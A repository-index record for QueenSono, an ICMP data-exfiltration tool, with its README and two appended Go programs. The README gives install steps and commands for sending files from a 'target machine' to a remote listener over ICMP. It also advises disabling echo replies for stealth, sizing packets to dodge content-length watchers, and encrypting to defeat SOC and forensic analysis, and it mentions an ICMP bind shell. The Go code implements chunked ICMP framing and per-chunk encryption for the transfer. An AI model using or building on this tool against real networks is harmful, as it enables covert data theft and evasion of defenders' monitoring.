{"id":19544831,"url":"https://github.com/ariary/queensono","last_synced_at":"2025-04-26T19:31:43.576Z","repository":{"id":46285304,"uuid":"400831046","full_name":"ariary/QueenSono","owner":"ariary","description":"Golang binary for data exfiltration with ICMP protocol (+ ICMP bindshell, http over ICMP tunneling, ...)","archived":false,"fork":false,"pushed_at":"2021-12-10T10:18:54.000Z","size":11999,"stargazers_count":146,"open_issues_count":3,"forks_count":24,"subscribers_count":4,"default_branch":"main","last_synced_at":"2025-04-04T17:11:33.012Z","etag":null,"topics":["bindshell","data-exfiltration","golang","icmp","pentest","pentest-tool","tunneling"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/ariary.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2021-08-28T15:49:30.000Z","updated_at":"2025-02-26T23:23:20.000Z","dependencies_parsed_at":"2022-09-26T17:41:07.362Z","dependency_job_id":null,"html_url":"https://github.com/ariary/QueenSono","commit_stats":null,"previous_names":[],"tags_count":4,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ariary%2FQueenSono","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ariary%2FQueenSono/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ariary%2FQueenSono/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ariary%2FQueenSono/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/ariary","download_url":"https://codeload.github.com/ariary/QueenSono/tar
.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":251041406,"owners_count":21527186,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bindshell","data-exfiltration","golang","icmp","pentest","pentest-tool","tunneling"],"created_at":"2024-11-11T03:32:21.414Z","updated_at":"2025-04-26T19:31:42.682Z","avatar_url":"https://github.com/ariary.png","language":"Go","funding_links":[],"categories":[],"sub_categories":[],"readme":"\u003ch1 align=\"center\"\u003eQueenSono \u003ci\u003e ICMP Data Exfiltration \u003c/i\u003e\u003c/h1\u003e\n\n\u003cp align=\"center\"\u003e\u003cimg src=https://github.com/ariary/QueenSono/blob/main/img/qs-small.png\u003e\n\u003cbr\u003e\u003cbr\u003e\u003ca href=\"https://github.com/enaqx/awesome-pentest\"\u003e\u003cimg src=\"https://awesome.re/mentioned-badge.svg\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003ch4 align=\"center\"\u003eA Golang Package for Data Exfiltration with the ICMP protocol.\u003c/h4\u003e\n\n\u003cp align=\"center\"\u003e\n  QueenSono only relies on the fact that ICMP traffic is usually not monitored, which is quite common. It can also be used on a network with basic ICMP inspection (i.e. a watcher on request frequency and content length) or to bypass the authentication step of a captive portal (used by many public Wi-Fi networks, e.g. airport Wi-Fi, to authenticate users after they connect). 
It tries to imitate \u003ca href=\"https://github.com/ytisf/PyExfil\"\u003ePyExfil\u003c/a\u003e (and others), with the idea that the target machine does not necessarily have Python installed (so providing a standalone binary is useful).\n  \u003cbr\u003e\u003cbr\u003e\n  \u003cstrong\u003e\n    \u003ca href=\"https://github.com/ariary/QueenSono#install\"\u003eInstall it\u003c/a\u003e\n    ·\n    \u003ca href=\"https://github.com/ariary/QueenSono#usage\"\u003eUse it\u003c/a\u003e\n    ·\n    \u003ca href=\"https://github.com/ariary/QueenSono#notes\"\u003eNotes\u003c/a\u003e\n    ·\n    \u003ca href=\"https://github.com/ariary/QueenSono/issues\"\u003eRequest Feature\u003c/a\u003e\n    ·\n    \u003ca href=\"https://github.com/ariary/QueenSono/tree/main/hack\"\u003e🎁\u003c/a\u003e\n  \u003c/strong\u003e\n\u003c/p\u003e\n\n## Install\n\n### With `curl`\n\n*\u003e From release*\n\n```shell\ncurl -LO https://github.com/ariary/QueenSono/releases/latest/download/qsreceiver\ncurl -LO https://github.com/ariary/QueenSono/releases/latest/download/qssender\n```\n\n### With `go`\n\n*\u003e Via `go install`*\n\nMake sure `$GOPATH/bin` is in your `$PATH` first.\n\nInstall `qssender`\n\n```shell\ngo install github.com/ariary/QueenSono/cmd/client@latest\nmv $GOPATH/bin/client $GOPATH/bin/qssender # rename binary\n```\n\nInstall `qsreceiver`\n\n```shell\ngo install github.com/ariary/QueenSono/cmd/server@latest\nmv $GOPATH/bin/server $GOPATH/bin/qsreceiver # rename binary\n```\n\n*\\\u003e Install the binary from source*\n\nClone the repo and download the dependencies locally:\n\n```shell\ngit clone https://github.com/ariary/QueenSono.git\ncd QueenSono\nmake before.build\n```\n\nTo build the ICMP packet sender `qssender`:\n\n    make build.queensono-sender\n\nTo build the ICMP packet receiver `qsreceiver`:\n\n    make build.queensono-receiver\n\n## Usage\n\n`qssender` is the binary that sends the ICMP packets to the listener, so it is the one you have to transfer to the target machine. 
\n\n`qsreceiver` is the listener on your local machine (or wherever you can receive ICMP packets).\n\nAll commands and flags of the binaries can be listed with `--help`.\n\n### Example 1: Send with \"ACK\" 🔙\n*\\\u003e In this example we want to send a big file and watch for echo replies to acknowledge the reception of the packets (ACK).*\n\n![demo](https://github.com/ariary/QueenSono/blob/main/img/qssono.gif)\n\nOn local machine:\n\n    $ qsreceiver receive -l 0.0.0.0 -p -f received_bible.txt\n\n\u003cdetails\u003e\n  \u003csummary\u003e\u003cb\u003eExplanation\u003c/b\u003e\u003c/summary\u003e\n    \u003cli\u003e\n    \u003ccode\u003e-l 0.0.0.0\u003c/code\u003e listen on all interfaces for ICMP packets\n    \u003c/li\u003e\n    \u003cli\u003e\n      \u003ccode\u003e-f received_bible.txt\u003c/code\u003e save received data in a file\n    \u003c/li\u003e\n    \u003cli\u003e\u003ccode\u003e-p\u003c/code\u003e show a progress bar of received data\u003c/li\u003e\n\n\u003c/details\u003e\n\n\nOn target machine:\n\n    $ wget https://raw.githubusercontent.com/mxw/grmr/master/src/finaltests/bible.txt # download a huge file (for the example)\n    $ qssender send file -d 2 -l 0.0.0.0 -r 10.0.0.92 -s 50000 bible.txt\n\n\u003cdetails\u003e\n  \u003csummary\u003e\u003cb\u003eExplanation\u003c/b\u003e\u003c/summary\u003e\n    \u003cli\u003e\n    \u003ccode\u003esend file\u003c/code\u003e send a file (\u003ccode\u003ebible.txt\u003c/code\u003e is the file in question)\n    \u003c/li\u003e\n    \u003cli\u003e\n      \u003ccode\u003e-d 2\u003c/code\u003e send a packet every 2 seconds\n    \u003c/li\u003e\n    \u003cli\u003e\u003ccode\u003e-l 0.0.0.0\u003c/code\u003e the listening address for \u003ci\u003eecho replies\u003c/i\u003e\u003c/li\u003e\n    \u003cli\u003e\u003ccode\u003e-r 10.0.0.92\u003c/code\u003e the address of my remote machine with \u003ccode\u003eqsreceiver\u003c/code\u003e listening\u003c/li\u003e\n    \u003cli\u003e\u003ccode\u003e-s 50000\u003c/code\u003e the 
data size I want to send in each packet. Note that 50000 bytes is far above the path MTU (about 1472 bytes of ICMP payload over Ethernet), so each packet is IP-fragmented on the wire and is an obvious outlier for any content-length watcher; keep \u003ccode\u003e-s\u003c/code\u003e small on monitored networks\u003c/li\u003e\n\u003c/details\u003e\n\n\n### Example 2: Send without \"ACK\" 🙈\n*\\\u003e In this example we want to send a message without waiting for echo replies (useful in case the target firewall filters incoming ICMP packets)*\n\n![demo](https://github.com/ariary/QueenSono/blob/main/img/qssono-trunc.gif?raw=true)\n\n\nOn local machine:\n\n    $ qsreceiver receive truncated 1 -l 0.0.0.0\n\n\u003cdetails\u003e\n  \u003csummary\u003e\u003cb\u003eExplanation\u003c/b\u003e\u003c/summary\u003e\n    \u003cli\u003e\u003ccode\u003ereceive truncated 1\u003c/code\u003e does not wait indefinitely if some packets never arrive (\u003ccode\u003e1\u003c/code\u003e is the \u003ccode\u003e-d\u003c/code\u003e delay used with \u003ccode\u003eqssender\u003c/code\u003e)\u003c/li\u003e\n\n\u003cbr\u003e\nFor stealthiness you can prevent the kernel from replying to any ICMP echo request (note that this also makes the listening host unpingable for everyone else):\n\n\u003cpre\u003e\u003ccode\u003eecho 1 | dd of=/proc/sys/net/ipv4/icmp_echo_ignore_all\u003c/code\u003e\u003c/pre\u003e\n\n\u003c/details\u003e\n\n\nOn target machine:\n\n    $ qssender send \"thisisatest i want to send a string w/o waiting for the echo reply\" -d 1 -l 0.0.0.0 -r 10.0.0.190 -s 1 -N\n\n\u003cdetails\u003e\n  \u003csummary\u003e\u003cb\u003eExplanation\u003c/b\u003e\u003c/summary\u003e\n    \u003cli\u003e\n    \u003ccode\u003e-N\u003c/code\u003e noreply option (don't wait for \u003ci\u003eecho replies\u003c/i\u003e)\n    \u003c/li\u003e\n\u003c/details\u003e\n\n\n### Example 3: Send encrypted data 🔒\n*\\\u003e In this example we want to send an encrypted message. 
As the command line could be spied on, we use asymmetric encryption (so if the key on the command line leaks, it isn't an issue)*\n\n![demo](https://github.com/ariary/QueenSono/blob/main/img/qssono-encryption.gif)\n\nOn local machine:\n\n    $ qsreceiver receive -l 0.0.0.0 --encrypt\n    \u003cOUTPUT PUBLIC KEY\u003e\n\n\u003cdetails\u003e\n  \u003csummary\u003e\u003cb\u003eExplanation\u003c/b\u003e\u003c/summary\u003e\n    \u003cli\u003e\u003ccode\u003e--encrypt\u003c/code\u003e use an encrypted exchange. It generates a public/private key pair. The public one is used by \u003ccode\u003eqssender\u003c/code\u003e to encrypt the data, the private one is used by \u003ccode\u003eqsreceiver\u003c/code\u003e to decrypt it\u003c/li\u003e\n\u003c/details\u003e\n\n\nOn target machine:\n```shell\n$ export MSG=\"\u003cyour message\u003e\"\n$ export KEY=\"\u003cpublic_key_from_qsreceiver_output\u003e\"\n$ qssender send \"$MSG\" -d 1 -l 0.0.0.0 -r 10.0.0.190 -s 5 --key \"$KEY\"\n```\n\n\u003cdetails\u003e\n  \u003csummary\u003e\u003cb\u003eExplanation\u003c/b\u003e\u003c/summary\u003e\n    \u003cli\u003e\n    \u003ccode\u003e--key\u003c/code\u003e provide the key for data encryption. Use the one printed by the \u003ccode\u003eqsreceiver\u003c/code\u003e command (quote \u003ccode\u003e$MSG\u003c/code\u003e: a message containing spaces would otherwise be split into several arguments)\n    \u003c/li\u003e\n\u003c/details\u003e\n\n#### About encryption\nRSA encryption is used to keep the exchanged data confidential. It can be useful, for example, to keep a SOC (or a later forensic review) from recovering the exchanged data with basic analysis, or simply for privacy.\n\nBut it comes at a cost. The choice of asymmetric encryption is motivated by the fact that the encryption key is passed on the command line (so it can be retrieved easily, e.g. from the process list or the shell history). Hence, we encrypt the data with the public key: if someone retrieves that key, they still cannot decrypt the message. The trade-off is that RSA ***encrypts only small messages***: a single RSA operation can process at most one modulus worth of plaintext (minus the padding overhead), so the plaintext size is bounded by the key size. Also, ***it is computationally expensive*** compared with a symmetric cipher.\n\nAnother point: as we want to limit the data size and the number of ping requests (to avoid detection, bugs, etc.), **use encryption only if needed**, ***as the ciphertext size always equals the size of the modulus*** (part of the key), which is large even for a one-word message.\n\n##### Enhancement\nCurrently, the whole message is encrypted and then chunked to be sent. On the other side we wait for all the packets (chunks), reconstruct the message and then decrypt it.\nBut this only works if we have received ALL the chunks; otherwise the decryption fails.\n\n\n=\u003e We could instead encrypt each chunk separately, sized according to the `-s` parameter, so that the chunks can be decrypted independently.\n\n\n### Bonus\n\nSee the [hack](https://github.com/ariary/QueenSono/tree/main/hack) section for fun things with `QueenSono`:\n* Bind shell using ICMP\n* HTTP over ICMP tunneling\n\n### Notes\n- only works on Linux (due to the use of the golang net icmp package)\n- needs the `cap_net_raw` capability, since raw ICMP sockets are used (grant it with `setcap`, or run as root)\n- if you actually send ICMP packets between 2 different machines and wait for echo replies, be sure to use an address reachable by the remote host as the listening address (do not use localhost or equivalent)\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fariary%2Fqueensono","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fariary%2Fqueensono","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fariary%2Fqueensono/lists"}
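Examples 1 and 2 of the README rely on the same mechanics: the sender cuts the data into `-s`-sized chunks, wraps each one in an ICMP echo request, and the receiver puts them back together, either acknowledging each chunk or, in `receive truncated` mode, giving up on chunks that never arrive. The Go program below is an added example written for this page, not QueenSono's own code, and assumes nothing about QueenSono's wire format: it uses the ICMP identifier as a transfer id and the sequence number as the chunk index (both assumptions of this example), frames and checksums the messages per RFC 792 with only the standard library, and reassembles them while reporting the missing indexes. No raw socket is opened, so it runs without `cap_net_raw`; the constructed sample string stands in for the exfiltrated file.

```go
// Added example (not QueenSono's code): a sender frames data chunks as ICMP
// echo requests, a receiver reassembles them and notices gaps. Using the
// identifier as transfer id and the sequence as chunk index is an assumption.
package main

import (
	"encoding/binary"
	"errors"
	"fmt"
)

const (
	icmpEchoRequest = 8 // ICMP type of an echo request
	icmpHeaderLen   = 8 // type, code, checksum, identifier, sequence
)

// checksum is the RFC 1071 Internet checksum computed over the whole message.
func checksum(b []byte) uint16 {
	var sum uint32
	for i := 0; i+1 < len(b); i += 2 {
		sum += uint32(binary.BigEndian.Uint16(b[i:]))
	}
	if len(b)%2 == 1 { // odd trailing byte is the high byte of a final word
		sum += uint32(b[len(b)-1]) << 8
	}
	for sum>>16 != 0 { // fold carries back in (one's complement addition)
		sum = (sum & 0xffff) + (sum >> 16)
	}
	return ^uint16(sum)
}

// BuildEcho builds an echo request whose payload is one data chunk.
func BuildEcho(id, seq uint16, payload []byte) []byte {
	pkt := make([]byte, icmpHeaderLen+len(payload))
	pkt[0] = icmpEchoRequest // code (pkt[1]) stays 0
	binary.BigEndian.PutUint16(pkt[4:], id)
	binary.BigEndian.PutUint16(pkt[6:], seq)
	copy(pkt[icmpHeaderLen:], payload)
	binary.BigEndian.PutUint16(pkt[2:], checksum(pkt)) // field is zero while summing
	return pkt
}

// ParseEcho validates an echo request and returns its id, sequence and payload.
func ParseEcho(pkt []byte) (id, seq uint16, payload []byte, err error) {
	if len(pkt) < icmpHeaderLen || pkt[0] != icmpEchoRequest || pkt[1] != 0 {
		return 0, 0, nil, errors.New("not an ICMP echo request")
	}
	if checksum(pkt) != 0 { // a valid message including its checksum sums to zero
		return 0, 0, nil, errors.New("bad ICMP checksum")
	}
	return binary.BigEndian.Uint16(pkt[4:]), binary.BigEndian.Uint16(pkt[6:]), pkt[icmpHeaderLen:], nil
}

// Chunk splits data into payloads of at most size bytes (the role of -s).
func Chunk(data []byte, size int) [][]byte {
	var out [][]byte
	for len(data) > 0 {
		n := size
		if n > len(data) {
			n = len(data)
		}
		out = append(out, data[:n])
		data = data[n:]
	}
	return out
}

// Reassemble joins the payloads of transfer id in sequence order and lists the
// chunk indexes that never arrived intact, so a receiver can give up after a
// timeout instead of blocking forever, as "receive truncated" does.
func Reassemble(pkts [][]byte, id uint16, total int) (data []byte, missing []int) {
	got := make(map[uint16][]byte)
	for _, p := range pkts {
		pid, seq, payload, err := ParseEcho(p)
		if err != nil || pid != id {
			continue // corrupted message or unrelated ping traffic
		}
		got[seq] = payload
	}
	for i := 0; i < total; i++ {
		if payload, ok := got[uint16(i)]; ok {
			data = append(data, payload...)
		} else {
			missing = append(missing, i)
		}
	}
	return data, missing
}

func main() {
	msg := []byte("constructed sample: this string stands in for the exfiltrated file")
	chunks := Chunk(msg, 16)
	var wire [][]byte
	for i, c := range chunks {
		wire = append(wire, BuildEcho(0xbeef, uint16(i), c))
	}
	lossy := append(append([][]byte{}, wire[:2]...), wire[3:]...) // chunk 2 lost in transit
	data, missing := Reassemble(lossy, 0xbeef, len(chunks))
	fmt.Printf("got %d bytes, missing chunks %v\n", len(data), missing)
}
```

Feeding the built messages to a real raw socket is the only part left out; the point here is that a receiver keyed on (identifier, sequence) can tell a dropped chunk from a late one, and that a flipped byte is rejected by the checksum rather than silently spliced into the file.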
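The Enhancement paragraph of the README proposes encrypting each chunk separately so the receiver does not need every chunk before it can decrypt anything. The Go program below is an added example for this page, not QueenSono's implementation, and it goes one step further with the standard hybrid construction: RSA-OAEP encrypts only a random AES-256 key, which costs exactly one modulus-sized packet, and each chunk is then sealed on its own with AES-GCM, adding 16 bytes per chunk rather than a full modulus. Every chunk can be decrypted independently, a lost chunk costs only itself, and a chunk that was modified in transit or replayed at a different position fails to authenticate. The `qs-session` label and the `SealChunk`/`OpenChunk` names are this example's own choices.

```go
// Added example (not QueenSono's code) of the per-chunk encryption proposed
// under "Enhancement", done as a hybrid scheme: RSA-OAEP wraps one random
// AES-256 key (a single modulus-sized header), then every chunk is sealed on
// its own with AES-GCM, so chunks decrypt independently and a lost, replayed
// or tampered chunk is detected without losing the others.
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"crypto/rsa"
	"crypto/sha256"
	"encoding/binary"
	"fmt"
)

// oaepLabel is an illustrative label; both sides must use the same one.
var oaepLabel = []byte("qs-session")

// Session is one transfer's symmetric state; a fresh key per transfer keeps
// the counter-derived GCM nonces unique.
type Session struct{ aead cipher.AEAD }

func newSession(key []byte) (*Session, error) {
	block, err := aes.NewCipher(key) // 32-byte key selects AES-256
	if err != nil {
		return nil, err
	}
	aead, err := cipher.NewGCM(block)
	if err != nil {
		return nil, err
	}
	return &Session{aead: aead}, nil
}

// NewSession (sender side) draws a random AES key and wraps it with the
// receiver's public key. The returned header is the only RSA-sized blob.
func NewSession(pub *rsa.PublicKey) (*Session, []byte, error) {
	key := make([]byte, 32)
	if _, err := rand.Read(key); err != nil {
		return nil, nil, err
	}
	s, err := newSession(key)
	if err != nil {
		return nil, nil, err
	}
	header, err := rsa.EncryptOAEP(sha256.New(), rand.Reader, pub, key, oaepLabel)
	return s, header, err
}

// OpenSession (receiver side) unwraps the header with the private key.
func OpenSession(priv *rsa.PrivateKey, header []byte) (*Session, error) {
	key, err := rsa.DecryptOAEP(sha256.New(), nil, priv, header, oaepLabel)
	if err != nil {
		return nil, err
	}
	return newSession(key)
}

// nonce is 12 bytes: 4 zero bytes then the chunk index, so every chunk of a
// session gets a distinct nonce and its position is bound into the ciphertext.
func nonce(index uint64) []byte {
	n := make([]byte, 12)
	binary.BigEndian.PutUint64(n[4:], index)
	return n
}

// SealChunk encrypts and authenticates chunk number index (16-byte tag added).
func (s *Session) SealChunk(index uint64, plaintext []byte) []byte {
	return s.aead.Seal(nil, nonce(index), plaintext, nil)
}

// OpenChunk decrypts one chunk; it fails if the chunk was modified or is
// presented at a different index than it was sealed with.
func (s *Session) OpenChunk(index uint64, ciphertext []byte) ([]byte, error) {
	return s.aead.Open(nil, nonce(index), ciphertext, nil)
}

func main() {
	priv, err := rsa.GenerateKey(rand.Reader, 2048) // the qsreceiver --encrypt role
	if err != nil {
		panic(err)
	}
	sender, header, err := NewSession(&priv.PublicKey)
	if err != nil {
		panic(err)
	}
	c := sender.SealChunk(0, []byte("hello")) // one 5-byte chunk, as with -s 5
	receiver, err := OpenSession(priv, header)
	if err != nil {
		panic(err)
	}
	pt, err := receiver.OpenChunk(0, c)
	fmt.Printf("header %d bytes, chunk %d bytes -> %q (err=%v)\n", len(header), len(c), pt, err)
}
```

The receiver still prints its public key and the sender still takes it on the command line, as in Example 3; what changes is what the public key protects (a 32-byte session key instead of the message itself), which is also what lifts the modulus-size cap on the plaintext and keeps the expensive RSA operation to one per transfer.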